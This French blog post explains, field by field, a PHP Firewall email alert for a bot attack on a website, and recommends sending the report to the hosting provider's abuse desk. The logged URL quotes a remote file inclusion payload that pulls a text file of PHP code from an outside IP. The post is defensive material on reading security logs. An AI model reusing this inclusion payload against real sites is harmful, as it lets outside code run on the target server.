Nous allons voir ici que PHP Firewall peut logguer un très grand nombre d'attaques de sites internet, et pour vous alarmer deux outils sont livrés nativement:
* le premier un petit rapport par email
* le second un fichier log présent sur votre FTP

Personnellement j'aime bien activer les deux pour conserver les traces et pouvoir remonter dans le temps

Nous allons prendre le rapport suivant pour en analyser le contenu

PHP Firewall logs of www.php-nanomus.org
23-01-2010 23:57:51
Bots attack
IP: 94.23.232.159 ]
DNS: rps9983.ovh.net
Agent: libwww-perl/5.808
URL: index.php?body=http://188.165.37.25/Nea/v6/echos.txt???
Referer: no referer

PHP Firewall logs of www.php-nanomus.org

vous spécifie quel site a été sujet à une attaque, ici www.php-nanomus.org


Ok, c'est parti on va rentrer dans le vif du sujet

23-01-2010 23:57:51

l'heure et la date  précise ...

Bots attack

type d'attaque détectée, ici une attaque par script, appelé bot car très souvent ce type de script pioche des urls dans une liste et balance ses tentatives, c'est ainsi très facile de trouver un site sensible à une faille ( une sorte de scanner de vulnérabilité de site web - tout dépend du script qui est en place ), cette technique très simple d'utilisation est particulièrement appréciée il suffit de se faire un joli script perl et roule ma poule, les moins avertis utiliseront toutefois PHP pour tenter d'arriver à leurs fins.
Bien évidemment si on se sert de ce type de scanner, on logue tout élément intéressant pour revenir frapper à la porte qui a répondu ' OK je suis là ' ( là est toute la finalité de php firewall, qui lui répond : te faire foutre : va ! )

IP: 94.23.232.159

l'ip du malin ( ou du blaireau plutôt mdr ), ici un rps de chez ovh

DNS: rps9983.ovh.net

oups que disais je !
on a bien le rps en question et même le numéro du rps !

Agent: libwww-perl/5.808

type de script, logiquement ce devrait être un script perl, mais dans notre cas nous allons voir qu'il s'agit d'un script php balancé dans un fichier txt ( truc classique du bricoleur qui peut avec ce type d'attaque arriver à ses fins ! danger quand même pour les sites non protégés et/ou mals protégés ), dans tous les cas il est possible de remonter pas mal d'informations via ce type d'attaque qui peuvent être un élément déclencheur d'un intéressement plus profond au site en question

URL: index.php?body=http://188.165.37.25/Nea/v6/echos.txt???

url par laquelle l'attaque a été relevée !
ici on notera que le mec n'est pas très fort quand même, car il tente d'inclure à distance un fichier texte
... la technique vieille du temps de mérovingiens est toutefois archi connues et très facilement blocable ( ici php firewall a justement intercepté cette attaque par ce type d'attaque trop basique )

Referer: no referer

indique ici si un référant est existant ce qui n'est pas le cas ici


Bon cette attaque basique est comme vous le voyez très bien décrite, on sait maintenant comment l'intru tente de s'y prendre, par où, avec quelle ip, quel serveur et quel fournisseur de serveur ( ici ovh )

il ne me reste plus qu'à balancer un abuse à ovh à cette adresse abuse@ovh.com en leur copiant collant le rapport !

comme on peut le voir le site a été bien protégé, j'ai eu mon rapport, et j'ai même pu identifier le malin qui tente de trouver une faille sur nanomus ( il peut d'ailleurs aller se coucher tout de suite mdr, ça ira plus vite pour lui  )